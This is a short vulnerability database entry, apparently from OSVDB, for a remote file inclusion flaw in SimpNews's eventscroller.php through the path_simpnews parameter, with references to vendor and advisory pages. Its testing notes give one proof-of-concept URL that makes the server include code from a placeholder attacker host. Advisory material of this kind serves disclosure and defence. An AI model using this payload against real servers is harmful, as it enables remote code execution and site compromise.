SimpNews eventscroller.php path_simpnews Variable Remote File Inclusion

2003-07-15T02:01:35
ID OSVDB:27817
Type osvdb
Reporter OSVDB
Modified 2003-07-15T02:01:35

Description

Manual Testing Notes

http://[target]/eventscroller.php?path_simpnews=http://[attacker]/

References:

Vendor URL: http://www.boesch-it.de/sw/php-scripts/simpnews/english/index.php Secunia Advisory ID:9306 Related OSVDB ID: 27816 Packet Storm: http://packetstorm.linuxsecurity.com/0307-exploits/PUPET-simpnews.txt